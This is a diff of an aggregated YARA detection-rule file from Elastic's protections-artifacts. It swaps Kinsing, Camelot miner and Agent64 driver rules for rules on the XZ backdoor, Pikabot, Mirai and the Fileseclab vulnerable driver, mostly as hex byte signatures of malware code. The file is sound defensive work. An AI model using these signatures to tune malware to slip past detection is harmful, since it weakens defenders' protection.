hash = "43e14c9713b1ca1f3a7f4bcb57dd3959d3a964be5121eb5aba312de41e2fb7a6" - logic_hash = "d2865a869d0cf0bf784106fe6242a4c7f58e58a43c4d4ae0241b10569810904d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Malxmr.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "07db41a4ddaac802b04df5e5bbae0881fead30cb8f6fa53a8a2e1edf14f2d36b" + logic_hash = "4d40337895e63d3dc6f0d94889863f0f5017533658210b902b08d84cf3588cab" score = 75 quality = 73 tags = "FILE, MEMORY" - fingerprint = "7aa556e481694679ce0065bcaaa4d35e2c2382326681f03202b68b1634db08ab" + fingerprint = "473e686a74e76bb879b3e34eb207d966171f3e11cf68bde364316c2ae5cd3dc3" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101343,206 +101813,231 @@ rule ELASTIC_Linux_Trojan_Generic_4675Dffa : FILE MEMORY os = "linux" strings: - $a1 = ", i = , not , val ./zzzz.local.onion" - $a2 = { 61 74 20 20 25 76 3D 25 76 2C 20 28 63 6F 6E 6E 29 20 28 73 63 61 6E 20 20 28 73 63 } + $a = { 78 71 51 58 5A 5A 4D 31 5A 35 59 6B 4D 78 61 47 4A 58 55 54 4A } condition: all of them } -rule ELASTIC_Windows_Vulndriver_Agent64_8Ef48Aeb : FILE +rule ELASTIC_Linux_Trojan_Xzbackdoor_74E87A9D : FILE MEMORY { meta: - description = "Subject: eSupport.com, Inc OR Phoenix Technologies Ltd, Name: Agent64.sys, Version: 6.0" + description = "Detects Linux Trojan Xzbackdoor (Linux.Trojan.XZBackdoor)" author = "Elastic Security" - id = "8ef48aeb-56b2-408b-aaf1-b130d7eb1cf4" - date = "2022-07-19" - modified = "2022-07-19" + id = "74e87a9d-11c1-4e86-bb3c-63a3c51c50df" + date = "2024-03-30" + modified = "2024-04-03" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_Agent64.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748" - hash = "4045ae77859b1dbf13972451972eaaf6f3c97bea423e9e78f1c2f14330cd47ca" - logic_hash = "a35f82202507e582e3cbc7018656545fcee1244ec1638a696f0b7c970fd5023c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_XZBackdoor.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5448850cdc3a7ae41ff53b433c2adbd0ff492515012412ee63a40d2685db3049" + logic_hash = "c777171c36d9369ade7bf44c7cc4e5aee16bb4c803431bc480cc0f8ebb2819c0" score = 75 quality = 75 - tags = "FILE" - fingerprint = "3eab3bb33b75aec13d91d503a768001fc0da09a41c792904e4a5eab568b4f6f4" - threat_name = "Windows.VulnDriver.Agent64" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "6ec0ee53f66167f7f2bbe5420aa474681701ed8f889aaad99e3990ecc4fb6716" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $subject_name_1 = { 06 03 55 04 03 [2] 50 68 6F 65 6E 69 78 20 54 65 63 68 6E 6F 6C 6F 67 69 65 73 20 4C 74 64 } - $subject_name_2 = { 06 03 55 04 03 [2] 65 53 75 70 70 6F 72 74 2E 63 6F 6D 2C 20 49 6E 63 } - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 [1-8] 41 00 67 00 65 00 6E 00 74 00 36 00 34 00 2E 00 73 00 79 00 73 00 00 00 } - $product_version = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E [1-8] 36 00 2E 00 30 } - $product_name = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 [1-8] 44 00 72 00 69 00 76 00 65 00 72 00 41 00 67 00 65 00 6E 00 74 } + $a1 = "yolAbejyiejuvnup=Evjtgvsh5okmkAvj" + $a2 = { 0A 31 FD 3B 2F 1F C6 92 92 68 32 52 C8 C1 AC 28 34 D1 F2 C9 75 C4 76 5E B1 F6 88 58 88 93 3E 48 10 0C B0 6C 3A BE 14 EE 89 55 D2 45 00 C7 7F 6E 20 D3 2C 60 2B 2C 6D 31 00 } + $b1 = { 48 8D 7C 24 08 F3 AB 48 8D 44 24 08 48 89 D1 4C 89 C7 48 89 C2 E8 ?? ?? ?? ?? 89 C2 } + $b2 = { 31 C0 49 89 FF B9 16 00 00 00 4D 89 C5 48 8D 7C 24 48 4D 89 CE F3 AB 48 8D 44 24 48 } + $b3 = { 4D 8B 6C 24 08 45 8B 3C 24 4C 8B 63 10 89 85 78 F1 FF FF 31 C0 83 BD 78 F1 FF FF 00 F3 AB 79 07 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and int16 ( uint32(0x3C)+0x18)==0x020b and any of ($subject_name*) and $original_file_name and $product_version and $product_name + 1 of ($a*) or all of ($b*) } -rule ELASTIC_Linux_Trojan_Kinsing_196523Fa : FILE MEMORY +rule ELASTIC_Windows_Trojan_Pikabot_8C6750B5 : FILE MEMORY { meta: - description = "Detects Linux Trojan Kinsing (Linux.Trojan.Kinsing)" + description = "Detects Windows Trojan Pikabot (Windows.Trojan.PikaBot)" author = "Elastic Security" - id = "196523fa-2bb5-4ada-b929-ddc3d5505b73" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Kinsing.yar#L1-L18" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "baa5808fcf22700ae96844dbf8cb3bec52425eec365d2ba4c71b73ece11a69a2" + id = "8c6750b5-d232-4b72-8fe0-3a00f7058420" + date = "2023-06-05" + modified = "2023-06-19" + reference = "https://www.elastic.co/security-labs/pikabot-i-choose-you" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_PikaBot.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "59f42ecde152f78731e54ea27e761bba748c9309a6ad1c2fd17f0e8b90f8aed1" + logic_hash = "03e36f927513625d1dd997c79843b1b14e344e8411155740213d7aff9794c5c6" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "29fa6e4fe5cbcd5c927e6b065f3354e4e9015e65814400687b2361fc9a951c74" + fingerprint = "5995c2857b660d92afc197d8a2b0323f4b4f6a0d65d1aeea5d53353c10e8092a" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 64 65 38 5F 00 64 48 8B 0C 25 F8 FF FF FF 48 3B 61 10 76 35 48 83 } + $byte_seq0 = { B8 00 00 00 00 CD 2D 90 C3 CC CC CC CC CC CC CC } + $byte_seq1 = { 64 A1 30 00 00 00 8B 40 ?? C3 } + $byte_seq2 = { 8B 45 FC 8B 44 85 B4 89 45 F0 8B 45 08 89 45 F8 8B 45 10 C1 E8 02 89 45 F4 } + $byte_seq3 = { 8B 4C 8D BC ?? 75 FC 33 C0 64 A1 30 00 00 00 8B 40 68 83 E0 70 89 45 FC } + $byte_seq4 = { 8B 45 F8 8B 4D 0C 89 08 8B 45 F8 83 C0 04 89 45 F8 8B 45 F4 48 89 45 F4 } + $byte_seq5 = { 64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8B 00 8B 00 8B 40 18 C3 } condition: - all of them + 4 of them } -rule ELASTIC_Linux_Trojan_Kinsing_7Cdbe9Fa : FILE MEMORY +rule ELASTIC_Windows_Trojan_Pikabot_5B220E9C : FILE MEMORY { meta: - description = "Detects Linux Trojan Kinsing (Linux.Trojan.Kinsing)" + description = "Detects Windows Trojan Pikabot (Windows.Trojan.PikaBot)" author = "Elastic Security" - id = "7cdbe9fa-39a3-43a0-853a-16f41e20f304" - date = "2021-12-13" - modified = "2022-01-26" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Kinsing.yar#L20-L38" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b3527e3d03a30fcf1fdaa73a1b3743866da6db088fbfa5f51964f519e22d05e6" - logic_hash = "c6f5d2cf0430301ec0eae57808100203b69428f258e0e6882fecbc762d73f4bf" + id = "5b220e9c-3232-4a86-82b7-31f96c95242c" + date = "2024-02-06" + modified = "2024-02-08" + reference = "https://www.elastic.co/security-labs/pikabot-i-choose-you" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_PikaBot.yar#L27-L52" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d836b06b0118e6d258e318b1cfdc509cacc0859c6a6b3d7c5f4d2525e00d97b2" + logic_hash = "1d2158716b7c32734f12f8528352a3872e21fea2f9b21a36d6ac44fcd50a9f3c" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "2452c2821b4ca104a18d3733ee8f6744a738aca197aa35392c480e224a5f8175" + fingerprint = "3a7ba8156f9ad017cdb8630770bf900c198215306a125f6f7dcd845f2c683948" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 73 2E 72 75 22 20 7C 20 61 77 6B 20 27 7B 70 72 69 6E 74 20 } + $byte_seq0 = { 03 44 95 ?? 42 83 FA ?? 7C ?? EB ?? } + $byte_seq1 = { 3B C1 73 ?? 80 3C 18 ?? 75 ?? C6 04 18 ?? 40 EB ?? } + $byte_seq2 = { 03 C7 03 C8 0F B6 F9 8A 84 3D 34 FD FF FF 88 84 35 34 FD FF FF } + $byte_seq3 = { 55 8B EC 83 EC 0C 33 C0 C7 45 F4 05 00 00 00 C7 45 F8 32 00 00 00 8B D0 C7 45 FC C9 FF FF FF } + $byte_seq4 = { 55 8B EC 51 51 53 56 89 55 F8 89 4D FC 8B 75 FC 8B 45 F8 33 C9 0F A2 89 06 89 5E 04 89 4E 08 89 } + $byte_seq5 = { 8D 5D E8 59 33 D2 C7 45 F8 04 00 00 00 8A 03 8D 0C 16 43 88 04 39 83 6D F8 01 8D 52 04 75 EE 46 } + $byte_seq6 = { 55 8B EC 51 51 53 56 89 55 F8 89 4D FC 8B 75 FC 8B 45 F8 33 C9 0F A2 89 06 89 5E 04 89 4E 08 89 } condition: - all of them + 2 of them } -rule ELASTIC_Linux_Trojan_Kinsing_2C1Ffe78 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Pikabot_5441F511 : FILE MEMORY { meta: - description = "Detects Linux Trojan Kinsing (Linux.Trojan.Kinsing)" + description = "Related to Pikabot core" author = "Elastic Security" - id = "2c1ffe78-a965-4a70-8a9c-2cad705f8be7" - date = "2021-12-13" - modified = "2022-01-26" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Kinsing.yar#L40-L58" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b3527e3d03a30fcf1fdaa73a1b3743866da6db088fbfa5f51964f519e22d05e6" - logic_hash = "9561511710eef5877c5afa49890b77fbad31a6e312b5cd33fc01f91ff2a73583" + id = "5441f511-82f2-4971-b9ff-7fe739041357" + date = "2024-02-15" + modified = "2024-02-21" + reference = "https://www.elastic.co/security-labs/pikabot-i-choose-you" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_PikaBot.yar#L54-L78" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "fa44408874c6a007212dfc206cbecbac7a3e50df94da4ce02de2e04e9119c79f" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "6701b007ee14a022525301d53af0f4254bc26fdfbe27d3d5cebc2d40e8536ed6" + fingerprint = "7a90c7e21ebffd6276bd53e37d4a09df29d3d1167024b96a39504518f0a38dfe" + threat_name = "Windows.Trojan.PikaBot" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 73 74 73 20 22 24 42 49 4E 5F 46 55 4C 4C 5F 50 41 54 48 22 20 22 } + $handler_table = { 72 26 [6] 6F 24 [6] CB 0A [6] 6C 03 [6] 92 07 } + $api_hashing = { 3C 60 76 ?? 83 E8 20 8B 0D ?? ?? ?? ?? 6B FF 21 } + $debug_check = { A1 ?? ?? ?? ?? FF 50 ?? 50 50 80 7E ?? 01 74 ?? 83 7D ?? 00 75 ?? } + $checksum = { 55 89 E5 8B 55 08 69 02 E1 10 00 00 05 38 15 00 00 89 02 5D C3 } + $load_sycall = { 8F 05 ?? ?? ?? ?? 83 C0 04 50 8F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 04 A3 ?? ?? ?? ?? 31 C0 64 8B 0D C0 00 00 00 85 C9 } + $read_xbyte_config = { 8B 43 04 8B 55 F4 B9 FC FF FF FF 83 C0 04 29 D1 01 4B 0C 8D 0C 10 89 4B 04 85 F6 ?? ?? 89 16 89 C3 } condition: - all of them + 2 of them } -rule ELASTIC_Linux_Trojan_Kinsing_85276Fb4 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Pikabot_95Db8B5A : FILE MEMORY { meta: - description = "Detects Linux Trojan Kinsing (Linux.Trojan.Kinsing)" + description = "Related to Pikabot loader" author = "Elastic Security" - id = "85276fb4-11f4-4265-9533-a96b42247f96" - date = "2021-12-13" - modified = "2022-01-26" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Kinsing.yar#L60-L78" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b3527e3d03a30fcf1fdaa73a1b3743866da6db088fbfa5f51964f519e22d05e6" - logic_hash = "6919afd133e7e369eece10ea79d9d17a1a3fbb6210593395e0be157f8c262811" + id = "95db8b5a-f97d-42bd-a114-e35e031784e2" + date = "2024-02-15" + modified = "2024-02-21" + reference = "https://www.elastic.co/security-labs/pikabot-i-choose-you" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_PikaBot.yar#L80-L103" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "74073ceae1b26b953b7644d56a2ec92993b83802a30ce82c6921df5448ebab06" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "966d53d8fc0e241250a861107317266ad87205d25466a4e6cdb27c3e4e613d92" + fingerprint = "f9463fa18fc5975aeabf076490bd8fe79c62c822126c5320f90870a9b4032f60" + threat_name = "Windows.Trojan.PikaBot" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 65 5F 76 00 64 48 8B 0C 25 F8 FF FF FF 48 3B 61 10 76 38 48 83 } + $syscall_ZwQueryInfoProcess = { 68 9B 8B 16 88 E8 73 FF FF FF } + $syscall_ZwCreateUserProcess = { 68 B2 CE 2E CF E8 5F FF FF FF } + $load_sycall = { 8F 05 ?? ?? ?? ?? 83 C0 04 50 8F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 04 A3 ?? ?? ?? ?? 31 C0 64 8B 0D C0 00 00 00 85 C9 } + $payload_chunking = { 8A 84 35 ?? ?? ?? ?? 8A 95 ?? ?? ?? ?? 88 84 1D ?? ?? ?? ?? 88 94 35 ?? ?? ?? ?? 02 94 1D ?? ?? ?? ?? } + $loader_rc4_decrypt_chunk = { F7 FF 8A 84 15 ?? ?? ?? ?? 89 D1 8A 94 1D ?? ?? ?? ?? 88 94 0D ?? ?? ?? ?? 8B 55 08 88 84 1D ?? ?? ?? ?? 02 84 0D ?? ?? ?? ?? 0F B6 C0 8A 84 05 ?? ?? ?? ?? 32 04 32 } condition: - all of them + 2 of them } -rule ELASTIC_Linux_Cryptominer_Camelot_9Ac1654B : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Fileseclab_4A21229A : FILE { meta: - description = "Detects Linux Cryptominer Camelot (Linux.Cryptominer.Camelot)" + description = "Detects Windows Vulndriver Fileseclab (Windows.VulnDriver.Fileseclab)" author = "Elastic Security" - id = "9ac1654b-f2f0-4d32-8e2a-be30b3e61bb0" - date = "2021-01-12" - modified = "2021-09-16" + id = "4a21229a-8847-4909-b3cd-69b4078a4825" + date = "2024-03-05" + modified = "2024-03-21" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Camelot.yar#L1-L18" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "5de1f43803f3d3b94149ea39ed961e7b9a1ad86c15c5085e2e0a5f9c314e98ff" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Vulndriver_Fileseclab.yar#L1-L24" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ae55a0e93e5ef3948adecf20fa55b0f555dcf40589917a5bfbaa732075f0cc12" + logic_hash = "bac78186f3d46c6765bacaf6a324ff94e449261cefe2594cb38c4cc25db1f0de" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "156c60ee17e9b39cb231d5f0703b6e2a7e18247484f35e11d3756a025873c954" + tags = "FILE" + fingerprint = "dcbdbd375bae3d9206a82bbffa9f803492ed9588333075d93fad4b9f3261be7b" severity = 100 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { CD 41 C1 CC 0B 31 D1 31 E9 44 89 D5 44 31 CD C1 C9 07 41 89 E8 } + $a1 = "filwfp.sys" + $a2 = "filnk.sys" + $a3 = { 5C 00 64 00 65 00 76 00 69 00 63 00 65 00 5C 00 66 00 69 00 6C 00 77 00 66 00 70 00 } + $a4 = { 5C 00 64 00 65 00 76 00 69 00 63 00 65 00 5C 00 66 00 69 00 6C 00 77 00 66 00 70 00 } + $b1 = { 31 00 2C 00 20 00 30 00 2C 00 20 00 30 00 2C 00 20 00 } + $b2 = { 32 00 2C 00 20 00 30 00 2C 00 20 00 30 00 2C 00 20 00 } condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and 1 of ($a*) and 1 of ($b*) } -rule ELASTIC_Linux_Cryptominer_Camelot_Dd167Aa0 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_268Aac0B : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Camelot (Linux.Cryptominer.Camelot)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "dd167aa0-80e0-46dc-80d1-9ce9f6984860" + id = "268aac0b-c5c7-4035-8381-4e182de91e32" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Camelot.yar#L20-L37" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "88be4fbb337fa866e126021b40a01d86a33029071af7efc289a8c5490d21ea8a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "49c94d184d7e387c3efe34ae6f021e011c3046ae631c9733ab0a230d5fe28ead" + logic_hash = "6eae3aba35d3379fa194b66a1b4e0d78d0d0b88386cd4ea5dfeb3c072642c7ba" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2642e4c4c58d95cd6ed6d38bf89b108dc978a865473af92494b6cb89f4f877e2" + fingerprint = "9c581721bf82af7dc6482a2c41af5fb3404e01c82545c7b2b29230f707014781" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101550,28 +102045,28 @@ rule ELASTIC_Linux_Cryptominer_Camelot_Dd167Aa0 : FILE MEMORY os = "linux" strings: - $a = { E7 F2 AE 4C 89 EF 48 F7 D1 48 89 CE 48 89 D1 F2 AE 48 89 C8 48 } + $a = { 24 18 0F B7 44 24 20 8B 54 24 1C 83 F9 01 8B 7E 0C 89 04 24 8B } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Camelot_B25398Dd : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_D5F2Abe2 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Camelot (Linux.Cryptominer.Camelot)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "b25398dd-33cc-4ad8-b943-cd06ff7811fb" + id = "d5f2abe2-511f-474d-9292-39060bbf6feb" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Camelot.yar#L39-L57" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6fb3b77be0a66a10124a82f9ec6ad22247d7865a4d26aa49c5d602320318ce3c" - logic_hash = "e7fdb3c573909e8f197417278a6d333cc3743b05257d81fed46769b185354183" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c490586fbf90d360cf3b2f9e2dc943809441df3dfd64dadad27fc9f5ee96ec74" + logic_hash = "169e7e5d1a7ea8c219464e22df9be8bc8caa2e78e1bc725674c8e0b14f6b9fc5" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6bdcefe93b1c36848b79cdc6b2ff79deb04012a030e5d92e725c87e520c15554" + fingerprint = "475a1c92c0a938196a5a4bca708b338a62119a2adf36cabf7bc99893fee49f2a" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101579,28 +102074,27 @@ rule ELASTIC_Linux_Cryptominer_Camelot_B25398Dd : FILE MEMORY os = "linux" strings: - $a = { 04 76 48 8B 44 07 23 48 33 82 C0 00 00 00 48 89 44 24 50 49 8B } + $a = { 41 56 41 89 FE 40 0F B6 FF 41 55 49 89 F5 BE 08 00 00 00 41 54 41 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Camelot_6A279F19 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_1Cb033F3 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Camelot (Linux.Cryptominer.Camelot)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "6a279f19-3c9e-424b-b89e-8807f40b89eb" + id = "1cb033f3-68c1-4fe5-9cd1-b5d066c1d86e" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Camelot.yar#L59-L77" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5b01f72b2c53db9b8f253bb98c6584581ebd1af1b1aaee62659f54193c269fca" - logic_hash = "91e3c0d96fe5ab9c61b38f01d39639020ec459bec6348b1f87a2c5b1a874e24a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L41-L58" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "ebaf45ce58124aa91b07ebb48779e6da73baa0b80b13e663c13d8fb2bb47ad0d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1c0ead7a7f7232edab86d2ef023c853332254ce1dffe1556c821605c0a83d826" + fingerprint = "49201ab37ff0b5cdfa9b0b34b6faa170bd25f04df51c24b0b558b7534fecc358" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101608,28 +102102,28 @@ rule ELASTIC_Linux_Cryptominer_Camelot_6A279F19 : FILE MEMORY os = "linux" strings: - $a = { 89 F3 89 D6 48 83 EC 30 48 89 E2 64 48 8B 04 25 28 00 00 00 48 89 44 } + $a = { C3 EB 06 8A 46 FF 88 47 FF FF CA 48 FF C7 48 FF C6 83 FA FF } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Camelot_4E7945A4 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_Fa3Ad9D0 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Camelot (Linux.Cryptominer.Camelot)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "4e7945a4-b827-4496-89d8-e63c3141c773" + id = "fa3ad9d0-7c55-4621-90fc-6b154c44a67b" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Camelot.yar#L79-L97" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b7504ce57787956e486d951b4ff78d73807fcc2a7958b172febc6d914e7a23a7" - logic_hash = "aebc544076954fcce917e026467a8828b18446ce7c690b4c748562e311b7d491" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L60-L78" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6" + logic_hash = "5890c85872ea4508e673235b20b481972f613f6e5f9564c0237c458995532347" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "bb2885705404c7d49491ab39fa8f50d85c354a43b4662b948c30635030feee74" + fingerprint = "fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -101637,28 +102131,28 @@ rule ELASTIC_Linux_Cryptominer_Camelot_4E7945A4 : FILE MEMORY os = "linux" strings: - $a = { 89 E5 48 81 EC A0 00 00 00 48 89 7D F0 48 8B 7D F0 48 89 F8 48 05 80 00 } + $a = { CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Camelot_29C1C386 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_0Cb1699C : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Camelot (Linux.Cryptominer.Camelot)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "29c1c386-c09c-4a58-b454-fc8feb78051d" + id = "0cb1699c-9a08-4885-aa7f-0f1ee2543cac" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Camelot.yar#L99-L117" - license_url = 